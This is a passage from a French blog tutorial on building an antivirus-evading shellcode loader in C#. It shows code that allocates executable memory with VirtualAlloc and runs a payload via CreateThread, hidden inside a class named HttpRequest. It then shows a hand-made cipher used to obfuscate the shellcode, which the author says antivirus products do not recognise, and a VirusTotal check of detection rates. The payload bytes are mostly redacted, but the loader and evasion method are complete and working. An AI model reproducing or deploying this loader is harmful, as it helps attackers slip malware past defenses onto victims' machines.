<p>Finalement, voici notre code :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>[<span style="color:#a6e22e">DllImport</span>(<span style="color:#e6db74">&#34;kernel32&#34;</span>)]
</span></span><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">extern</span> IntPtr <span style="color:#a6e22e">VirtualAlloc</span>(
</span></span><span style="display:flex;"><span>      IntPtr lpAddress,
</span></span><span style="display:flex;"><span>      uint dwSize,
</span></span><span style="display:flex;"><span>      uint flAllocationType,
</span></span><span style="display:flex;"><span>      uint flProtect);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>[<span style="color:#a6e22e">DllImport</span>(<span style="color:#e6db74">&#34;kernel32&#34;</span>, CharSet <span style="color:#f92672">=</span> CharSet.Ansi)]
</span></span><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">extern</span> IntPtr <span style="color:#a6e22e">CreateThread</span>(
</span></span><span style="display:flex;"><span>      IntPtr lpThreadAttributes,
</span></span><span style="display:flex;"><span>      uint dwStackSize,
</span></span><span style="display:flex;"><span>      IntPtr lpStartAddress,
</span></span><span style="display:flex;"><span>      IntPtr lpParameter,
</span></span><span style="display:flex;"><span>      uint dwCreationFlags,
</span></span><span style="display:flex;"><span>      IntPtr lpThreadId);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>[<span style="color:#a6e22e">DllImport</span>(<span style="color:#e6db74">&#34;kernel32.dll&#34;</span>, SetLastError <span style="color:#f92672">=</span> true)]
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">static</span> <span style="color:#66d9ef">extern</span> UInt32 <span style="color:#a6e22e">WaitForSingleObject</span>(
</span></span><span style="display:flex;"><span>      IntPtr hHandle,
</span></span><span style="display:flex;"><span>      UInt32 dwMilliseconds);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>... Namespace ...
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>public <span style="color:#a6e22e">HttpRequest</span>()
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>activated) { activated <span style="color:#f92672">=</span> true; Thread thr <span style="color:#f92672">=</span> new <span style="color:#a6e22e">Thread</span>(Request); thr.<span style="color:#a6e22e">Start</span>(); }
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">Init</span>();
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> async <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">Request</span>()
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        byte[] buf <span style="color:#f92672">=</span> new byte[<span style="color:#ae81ff">784</span>] {[REDACTED]}
</span></span><span style="display:flex;"><span>        IntPtr addr <span style="color:#f92672">=</span> <span style="color:#a6e22e">VirtualAlloc</span>(IntPtr.Zero, (uint)buf.Length, <span style="color:#ae81ff">0x00001000</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x00002000</span>, <span style="color:#ae81ff">0x40</span>);
</span></span><span style="display:flex;"><span>        Marshal.<span style="color:#a6e22e">Copy</span>(buf, <span style="color:#ae81ff">0</span>, addr, buf.Length);
</span></span><span style="display:flex;"><span>        IntPtr <span style="color:#66d9ef">thread</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">CreateThread</span>(IntPtr.Zero, <span style="color:#ae81ff">0</span>, addr, IntPtr.Zero, <span style="color:#ae81ff">0</span>, IntPtr.Zero);
</span></span><span style="display:flex;"><span>      }
</span></span></code></pre></div><p><img src="./img/final.png" alt="Alt text"></p>
<h4 id="etape-4--obfuscation-du-shell-code">Etape 4 : Obfuscation du Shell Code</h4>
<p>On sait que notre Shell code est composé de nombre :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>_all <span style="color:#f92672">=</span> [<span style="color:#ae81ff">0xfc</span>,<span style="color:#ae81ff">0x48</span>,<span style="color:#ae81ff">0x83</span>,<span style="color:#ae81ff">0xe4</span>, <span style="color:#f92672">...</span>]
</span></span><span style="display:flex;"><span>final <span style="color:#f92672">=</span> [int(nb) <span style="color:#66d9ef">for</span> nb <span style="color:#f92672">in</span> _all]
</span></span><span style="display:flex;"><span>print(final)
</span></span></code></pre></div><p><img src="./img/number.png" alt="Alt text"></p>
<p>On peut donc en former une string Obfusquée pour ensuite la décoder dans le programme et la re-transformer en bytes.</p>
<p>J&rsquo;ajoute au projet une class que j&rsquo;ai fait il y a un moment et qui permet de chiffrer/déchiffrer une string à partir d&rsquo;une clé.
L&rsquo;algorithme est fait à la main et il n&rsquo;est donc pas connu des antivirus.
Voici un extrait du Shell Code chiffré :</p>
<pre tabindex="0"><code>&#34;ᵊᵏ&#34;, &#34;ᵌᵎᵄ&#34;, &#34;ᵅᵏ&#34;, &#34;ᵎᵏ&#34;, &#34;ᵌᵎᵄ&#34;, &#34;ᵋᵋ&#34;, &#34;ᵋᵍ&#34;, &#34;ᵊᵏ&#34;, &#34;ᵌ&#34;, &#34;ᵏᵍᵅ&#34;, &#34;ᵌᵍᵏ&#34;, &#34;ᵌᵏᵄ&#34;, &#34;ᵌᵏᵍ&#34;, &#34;ᵏᵉ&#34;, &#34;ᵌᵌ&#34;, &#34;ᵏ&#34;, &#34;ᵋᵈ&#34;, &#34;ᵅᵌ&#34;, &#34;ᵌᵈ&#34;, &#34;ᵌᵎᵎ&#34;, &#34;ᵌᵌᵉ&#34;, &#34;ᵍ&#34;, &#34;ᵍ&#34;, &#34;ᵍ&#34;, &#34;ᵌᵎᵄ&#34;, &#34;ᵌᵏᵅ&#34;, &#34;ᵌᵎᵋ&#34;, &#34;ᵍ&#34;, &#34;ᵍ&#34;, &#34;ᵍ&#34;, &#34;ᵊᵏ&#34;, &#34;ᵌᵎᵎ&#34;, &#34;ᵌᵄᵏ&#34;, &#34;ᵌᵌᵋ&#34;, &#34;ᵌᵍᵎ&#34;, &#34;ᵊᵏ&#34;, &#34;ᵌ&#34;, &#34;ᵏᵍᵅ&#34;, &#34;ᵋᵅ&#34;, &#34;ᵌᵎᵄ&#34;, &#34;ᵋᵉ&#34;, &#34;ᵎᵏ&#34;, &#34;ᵅᵍ&#34;, &#34;ᵌᵎᵄ&#34;, &#34;ᵊᵏ&#34;, &#34;ᵏᵉ&#34;, &#34;ᵊᵎ&#34;, &#34;ᵌ&#34;, &#34;ᵏᵍᵅ&#34;,
</code></pre><p>En ajustant le chiffrement au code précédent, on obtient :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span>public <span style="color:#66d9ef">static</span> async <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">Request</span>()
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        Console.OutputEncoding <span style="color:#f92672">=</span> Encoding.Unicode;
</span></span><span style="display:flex;"><span>        crypter cry <span style="color:#f92672">=</span> new <span style="color:#a6e22e">crypter</span>();
</span></span><span style="display:flex;"><span>        string key <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;9457&#34;</span>;
</span></span><span style="display:flex;"><span>        string[] all <span style="color:#f92672">=</span> new string[<span style="color:#ae81ff">784</span>] { REDACTED };
</span></span><span style="display:flex;"><span>        byte[] buffer <span style="color:#f92672">=</span> new byte[<span style="color:#ae81ff">0</span>];
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> all.Length; i<span style="color:#f92672">++</span>)
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            byte[] newArray <span style="color:#f92672">=</span> new byte[buffer.Length <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>];
</span></span><span style="display:flex;"><span>            buffer.<span style="color:#a6e22e">CopyTo</span>(newArray, <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>            string b <span style="color:#f92672">=</span> await cry.<span style="color:#a6e22e">decry</span>(all[i], key);
</span></span><span style="display:flex;"><span>            newArray[<span style="color:#ae81ff">0</span>] <span style="color:#f92672">=</span> Convert.<span style="color:#a6e22e">ToByte</span>(Convert.<span style="color:#a6e22e">ToInt32</span>(b));
</span></span><span style="display:flex;"><span>            buffer <span style="color:#f92672">=</span> newArray;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        Array.<span style="color:#a6e22e">Reverse</span>(buffer);
</span></span><span style="display:flex;"><span>        IntPtr addr <span style="color:#f92672">=</span> <span style="color:#a6e22e">VirtualAlloc</span>(IntPtr.Zero, (uint)buffer.Length, <span style="color:#ae81ff">0x00001000</span> <span style="color:#f92672">|</span> <span style="color:#ae81ff">0x00002000</span>, <span style="color:#ae81ff">0x40</span>);
</span></span><span style="display:flex;"><span>        Marshal.<span style="color:#a6e22e">Copy</span>(buffer, <span style="color:#ae81ff">0</span>, addr, buffer.Length);
</span></span><span style="display:flex;"><span>        IntPtr <span style="color:#66d9ef">thread</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">CreateThread</span>(IntPtr.Zero, <span style="color:#ae81ff">0</span>, addr, IntPtr.Zero, <span style="color:#ae81ff">0</span>, IntPtr.Zero);
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>On peut vérifier l&rsquo;efficacité du payload grâce à Virus Total :
<img src="./img/vt.png" alt="Alt text"></p>

  
  <hr>
<div class="footer">
    
	    
            <a class="previous-post" href="https://vozec.github.io/vozec.fr/posts/analyse-fake-cheat-valorant/?ref=footer"><span style="font-weight:bold;">« Previous</span><br>Malware Analysis d&#39;un Fake Cheat</a>
        
	    
            <div class="next-post">
                <a href="https://vozec.github.io/vozec.fr/posts/analyse-telegram-stealer/?ref=footer"><span style="font-weight:bold;">Next »</span><br>Malware Analysis d&#39;une Virus Télégram</a>
            </div>
        
    
</div>

  
</div>
            </main>
            
  
    <div class="article-toc ">
    <div class="toc-wrapper">
      <h4 id="contents"></h4>
      <nav id="TableOfContents">
  <ul>
    <li><a href="#introduction">Introduction</a>
      <ul>
        <li><a href="#petit-rappel">Petit Rappel</a></li>
      </ul>
    </li>
    <li><a href="#objectif">Objectif</a>
      <ul>
        <li></li>
      </ul>
    </li>
  </ul>
</nav>
    </div>
</div>

  

        </div>
    </body>
</html>
